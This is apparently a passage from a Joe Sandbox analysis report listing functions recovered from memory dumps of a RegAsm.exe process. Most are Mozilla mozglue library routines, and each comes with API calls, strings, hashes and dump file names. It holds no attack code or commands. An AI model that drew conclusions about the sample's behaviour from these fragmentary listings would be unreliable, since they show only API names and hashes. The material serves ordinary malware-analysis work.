Opcode ID: 9a1dd6a5b5ec6b0dc750112235bc1cea6acc42bbd090d5463b35af0b800dcd62
Instruction ID: 47851134dae280e2b14dd951d5f9ade316a889e93013579b91469e8948edc551
Opcode Fuzzy Hash: 9a1dd6a5b5ec6b0dc750112235bc1cea6acc42bbd090d5463b35af0b800dcd62
Instruction Fuzzy Hash: 53F0B4B21006089BC7118F16D888B9BB7F8EF97328F10012EF90687711CB76A806CB96

Function 6C2EEB00 Relevance: 6.0, APIs: 4, Instructions: 30threadsynchronizationCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C2EEB11
AcquireSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2EEB1E
memset.VCRUNTIME140(?,00000000,000000E0), ref: 6C2EEB3C
ReleaseSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2EEB5B
GetCurrentThreadId.KERNEL32 ref: 6C2EEBA4
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6C2EEBAC
GetCurrentThreadId.KERNEL32 ref: 6C2EEBC1
AcquireSRWLockExclusive.KERNEL32(6C32F4B8,?,?,00000000), ref: 6C2EEBCE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6C2EEBE5
ReleaseSRWLockExclusive.KERNEL32(6C32F4B8,00000000), ref: 6C2EEC37
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C2EEC46
CloseHandle.KERNEL32(?), ref: 6C2EEC55
free.MOZGLUE(00000000), ref: 6C2EEC5C

Strings

[I %d/%d] profiler_start, xrefs: 6C2EEBB4
[I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6C2EEA9B

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$CurrentThread$AcquireRelease$?profiler_init@baseprofiler@mozilla@@CloseHandleObjectSingleWait_getpidfreememset
String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
API String ID: 2885072826-1186885292
Opcode ID: 84c4d5707ec9c41045cd28fd635ed22bc52bdb95419f33cde7114ba7507a7569
Instruction ID: 07d5c1d273873e477a64f82104818eacc4ce200262d080c1ddf69697e3921170
Opcode Fuzzy Hash: 84c4d5707ec9c41045cd28fd635ed22bc52bdb95419f33cde7114ba7507a7569
Instruction Fuzzy Hash: 57F0A7317002249BDF005F59EC05B95777CAF8A659F11002DF906D7740C7FC6445CBA9

Function 6C2F20B0 Relevance: 6.0, APIs: 4, Instructions: 28threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C2F20B7
AcquireSRWLockExclusive.KERNEL32(00000000,?,6C2DFBD1), ref: 6C2F20C0
ReleaseSRWLockExclusive.KERNEL32(00000000,?,6C2DFBD1), ref: 6C2F20DA
free.MOZGLUE(00000000,?,6C2DFBD1), ref: 6C2F20F1

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: fe38872093eec00768a92d940590571cf0be49ddde2063784219fede4702158d
Instruction ID: 6b27918203e3ed335174021f8c818b8590199aa8ba0fd07bc909748393b34a25
Opcode Fuzzy Hash: fe38872093eec00768a92d940590571cf0be49ddde2063784219fede4702158d
Instruction Fuzzy Hash: F0E0E572600A1C8BC6209F25980858EF7FDEF87218B10022EE80783B00DB7AF54686D6

Function 004011D0 Relevance: 6.0, APIs: 4, Instructions: 26COMMON

Download Yara Rule

APIs

CreateDCA.GDI32(0133A978,00000000,00000000,00000000), ref: 004011E2
GetDeviceCaps.GDI32(?,0000000A), ref: 004011F1
ReleaseDC.USER32(00000000,?), ref: 00401200
ExitProcess.KERNEL32 ref: 00401211

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CapsCreateDeviceExitProcessRelease
String ID:
API String ID: 272768826-0
Opcode ID: 260d31c59a6825f795d57121dd492f178e6e6c923e6ea3e29db046fa5edd3e89
Instruction ID: ed9884e5d74d46977e8df864d01039e67b6c1105ae855f948e647e2f19da04a8
Opcode Fuzzy Hash: 260d31c59a6825f795d57121dd492f178e6e6c923e6ea3e29db046fa5edd3e89
Instruction Fuzzy Hash: B2F0E57DAC0304BFE710AFE0DC49B6D7BB6E745701F109159F605A62D0D6755501CB52

Function 6C2F85B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6C2F85D3

Part of subcall function 6C2BCA10: malloc.MOZGLUE(?), ref: 6C2BCA26

?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6C2F8725

Strings

map/set<T> too long, xrefs: 6C2F8720

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Xlength_error@std@@mallocmoz_xmalloc
String ID: map/set<T> too long
API String ID: 3720097785-1285458680
Opcode ID: de2e8db9f03eb0e2b2097a9aa49892ed8ed5e9ad59606547cc9448811fc4ebc4
Instruction ID: 00993059ef8cf15a2d1a3fb626a0d425978505d9e99a8d7c250c1dbce56aa4ad
Opcode Fuzzy Hash: de2e8db9f03eb0e2b2097a9aa49892ed8ed5e9ad59606547cc9448811fc4ebc4
Instruction Fuzzy Hash: 9651567464464A8FD701CF1AC184B59FBF1BF4A318F18C19AD8695BB52C335E886CF92

Function 6C2ABD40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C2ABDEB
?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C2ABE8F

Strings

0, xrefs: 6C2ABE5B

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
String ID: 0
API String ID: 2811501404-4108050209
Opcode ID: 6940a4fbdcacf17c085f7f598d39869964d3355d7d0a4a6ec470fec3973d19af
Instruction ID: 5cd8343e1c9c13e71b34880b860d0e5d22c59ace51e420ed61bcc06e218284d2
Opcode Fuzzy Hash: 6940a4fbdcacf17c085f7f598d39869964d3355d7d0a4a6ec470fec3973d19af
Instruction Fuzzy Hash: 7641AD7590974DCFC741CFB8C581A9BBBE4AF8A348F408A1DFD85A7611D730994ACB82

Function 6C2A9A20 Relevance: 5.3, APIs: 4, Instructions: 338COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6C2A9B2C
memcpy.VCRUNTIME140(6C2A99CF,00000000,?), ref: 6C2A9BB6
memcpy.VCRUNTIME140(?,?,?), ref: 6C2A9BF8
memcpy.VCRUNTIME140(?,?,?), ref: 6C2A9DE4

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 06a99f5aa2268d575f548ad3d841574e9fce601d5e240614979018b75ad7a40d
Instruction ID: 60739d643763e6dfda8197e047a2be41aea3a47ee5f0467884ad73935f09efff
Opcode Fuzzy Hash: 06a99f5aa2268d575f548ad3d841574e9fce601d5e240614979018b75ad7a40d
Instruction Fuzzy Hash: 69D16E71A0060A9FCB14DFA9C880AAEB7F6FF88314F184529E945A7B40D771ED56CB90

Function 6C2F0A70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

Part of subcall function 6C2B37F0: ?ensureCapacitySlow@ProfilingStack@baseprofiler@mozilla@@AAEXXZ.MOZGLUE(?,?,?,?,6C30145F,baseprofiler::AddMarkerToBuffer,00000000,?,00000039,00000000), ref: 6C2B380A

Part of subcall function 6C2E8DC0: moz_xmalloc.MOZGLUE(00000038,?,?,00000000,?,6C3006E6,?,?,00000008,?,?,?,?,?,?,?), ref: 6C2E8DCC

Part of subcall function 6C2F0B60: moz_xmalloc.MOZGLUE(00000080,?,?,?,?,6C2F138F,?,?,?), ref: 6C2F0B80

?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,00000001,?,?,6C2F138F,?,?,?), ref: 6C2F0B27
free.MOZGLUE(?,?,?,?,?,6C2F138F,?,?,?), ref: 6C2F0B3F

Strings

baseprofiler::profiler_capture_backtrace, xrefs: 6C2F0AB5

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: moz_xmalloc$?ensure?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CapacityCaptureChunkedOptions@2@@ProfileProfilingSlow@StackStack@baseprofiler@mozilla@@free
String ID: baseprofiler::profiler_capture_backtrace
API String ID: 3592261714-147032715
Opcode ID: ce12861b5db254e891cbbd59e4e53d41c806c6c2196ec3f4962056538f89974a
Instruction ID: 2d936666c5b8207460a9d785595c2f990e3e9aade8f5d078d5122ab08926f823
Opcode Fuzzy Hash: ce12861b5db254e891cbbd59e4e53d41c806c6c2196ec3f4962056538f89974a
Instruction Fuzzy Hash: 7621B174B4024D9BDB04DF54C850AFEB379AF85708F10002DED259BB40DB74A906CBA1

Function 6C2AF180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(?,?), ref: 6C2AF19B

Part of subcall function 6C2CD850: EnterCriticalSection.KERNEL32(?), ref: 6C2CD904
Part of subcall function 6C2CD850: LeaveCriticalSection.KERNEL32(?), ref: 6C2CD971
Part of subcall function 6C2CD850: memset.VCRUNTIME140(?,00000000,?), ref: 6C2CD97B

mozalloc_abort.MOZGLUE(?), ref: 6C2AF209

Strings

d, xrefs: 6C2AF1F5

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeavecallocmemsetmozalloc_abort
String ID: d
API String ID: 3775194440-2564639436
Opcode ID: 50364651eb5d03bf88cf06ad7b68210aaf7381b464a1b70d77fb48ed9f0e8fc0
Instruction ID: 9a8036f6355d2a7a334ce42909547d7a91b54b768c2b7fb1858ced401bdd1b25
Opcode Fuzzy Hash: 50364651eb5d03bf88cf06ad7b68210aaf7381b464a1b70d77fb48ed9f0e8fc0
Instruction Fuzzy Hash: 4A113A36E0164E86EB048FACD9511EEB379DF96309B11521DEC45ABA11EB749D86C380

Function 00418B60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60timeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

GetSystemTime.KERNEL32(?,01341B00,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86

Strings

cI@, xrefs: 00418B6C, 00418BE5, 00418BF0, 00418C04, 00418BD3, 00418BF3
cI@, xrefs: 00418BB1, 00418BE1, 00418BE4

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: SystemTimelstrcpy
String ID: cI@$cI@
API String ID: 62757014-1697673767
Opcode ID: aa47265d88191fa58763f5682c75fb926ce4e7207e02c7c3cde0455718616323
Instruction ID: 15f3dfc6f8d56a301bf8b2a7a9260479b6db203ca669f730be279af5ebf73ee3
Opcode Fuzzy Hash: aa47265d88191fa58763f5682c75fb926ce4e7207e02c7c3cde0455718616323
Instruction Fuzzy Hash: 7111E971D00008AFCB04EFA9C8919EE77B9EF58314F04C05EF01667241DF38AA86CBA6

Function 6C2BCA10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

malloc.MOZGLUE(?), ref: 6C2BCA26

Part of subcall function 6C2BCAB0: EnterCriticalSection.KERNEL32(?), ref: 6C2BCB49
Part of subcall function 6C2BCAB0: LeaveCriticalSection.KERNEL32(?), ref: 6C2BCBB6

mozalloc_abort.MOZGLUE(?), ref: 6C2BCAA2

Strings

d, xrefs: 6C2BCA6C

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeavemallocmozalloc_abort
String ID: d
API String ID: 3517139297-2564639436
Opcode ID: 17e25e790121464655be7de15344d874aec4a8c9b8612e7cae529af96830012a
Instruction ID: 4f83da9a116437b934e4a6b3ba53faa36c9959be90f86b1707ac632e922dc6bc
Opcode Fuzzy Hash: 17e25e790121464655be7de15344d874aec4a8c9b8612e7cae529af96830012a
Instruction Fuzzy Hash: AA112132E0078C87DB01DF68C8110FDB3B8EFA6648B45822DEC45A7612EB74A5C9C380

Function 6C2E3CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C2E3D19
mozalloc_abort.MOZGLUE(?), ref: 6C2E3D6C

Strings

d, xrefs: 6C2E3D58

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: _errnomozalloc_abort
String ID: d
API String ID: 3471241338-2564639436
Opcode ID: 312ef7ad61f47c412adfd97624257e20ed7d57d619de4e2072e72c888a0a97ea
Instruction ID: 9c1502e2abc7e8fa1abca8b524d1f3f637bb6422e263335f3f17f7a8b7563409
Opcode Fuzzy Hash: 312ef7ad61f47c412adfd97624257e20ed7d57d619de4e2072e72c888a0a97ea
Instruction Fuzzy Hash: 57115739E0478CDBDF018B69C8154EDB379FF9A31AB85821CEC44AB612EB30A584C350

Function 6C2C1A50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

realloc.MOZGLUE(?,?), ref: 6C2C1A6B

Part of subcall function 6C2C1AF0: EnterCriticalSection.KERNEL32(?), ref: 6C2C1C36

mozalloc_abort.MOZGLUE(?), ref: 6C2C1AE7

Strings

d, xrefs: 6C2C1AB1

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: CriticalEnterSectionmozalloc_abortrealloc
String ID: d
API String ID: 2670432147-2564639436
Opcode ID: 8512ec2da589a364a9b56a43b30962e2e45c5d6c20a69fe5ea6ebe43b8c73915
Instruction ID: d82161c06f6da4371b8fb4f4952bad0e67191a3e2ff97a8b605ebffb390d5229
Opcode Fuzzy Hash: 8512ec2da589a364a9b56a43b30962e2e45c5d6c20a69fe5ea6ebe43b8c73915
Instruction Fuzzy Hash: 9D112332E0068C87CF058BA9C8124EEB3B8EF96204F458718EC456B612EB71E5C4C381

Function 6C2B4730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C2B44B2,6C32E21C,6C32F7F8), ref: 6C2B473E
GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C2B474A

Strings

GetNtLoaderAPI, xrefs: 6C2B4744

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetNtLoaderAPI
API String ID: 1646373207-1628273567
Opcode ID: f70feb7e5fb474c3f10a37c278261f857e4345b2348e93291ba1e274c9817579
Instruction ID: 73524a27e7617bba5810826a5dd0b83c3d383e899504a1a7db71c80070e94bb8
Opcode Fuzzy Hash: f70feb7e5fb474c3f10a37c278261f857e4345b2348e93291ba1e274c9817579
Instruction Fuzzy Hash: C1014C757013599FDF00AFA68984A59BBBDEB8E356B044069EE06DB700DB78D801CF91

Function 6C306DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6C306E22
__Init_thread_footer.LIBCMT ref: 6C306E3F

Strings

MOZ_DISABLE_WALKTHESTACK, xrefs: 6C306E1D

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Init_thread_footergetenv
String ID: MOZ_DISABLE_WALKTHESTACK
API String ID: 1472356752-1153589363
Opcode ID: 77c34187727415aee432285cc1647943f3ff36f6780bbd77899571d837abde11
Instruction ID: bc427ed7e613bc0513f900e4501d527633056c69e7cde48a88039dc362a1ed95
Opcode Fuzzy Hash: 77c34187727415aee432285cc1647943f3ff36f6780bbd77899571d837abde11
Instruction Fuzzy Hash: E4F02432305380CBEF008B68CB50E817779D72B618F040169CC0046F51C72EB586CFA3

Function 6C2B9E70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 6C2B9EEF

Strings

NaN, xrefs: 6C2B9EC1
Infinity, xrefs: 6C2B9EB7

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Init_thread_footer
String ID: Infinity$NaN
API String ID: 1385522511-4285296124
Opcode ID: 5a87caadfd6a9e8d5f069fac35ae9faf1bf3cb3a7814ee93aa1593e321b2d1c0
Instruction ID: 54d0c914aadead95562b1038960500cd1b5e41a2b4c393f8eacde3d3780cdeaa
Opcode Fuzzy Hash: 5a87caadfd6a9e8d5f069fac35ae9faf1bf3cb3a7814ee93aa1593e321b2d1c0
Instruction Fuzzy Hash: 91F0AF70A00265CADF00AF18DA46B513779A32FB1DF600A1DDA041AB49D33D7556CF82

Function 6C2B6C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0K.l,?,6C2E4B30,80000000,?,6C2E4AB7,?,6C2A43CF,?,6C2A42D2), ref: 6C2B6C42

Part of subcall function 6C2BCA10: malloc.MOZGLUE(?), ref: 6C2BCA26

moz_xmalloc.MOZGLUE(0K.l,?,6C2E4B30,80000000,?,6C2E4AB7,?,6C2A43CF,?,6C2A42D2), ref: 6C2B6C58

Strings

0K.l, xrefs: 6C2B6C33, 6C2B6C41, 6C2B6C57

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

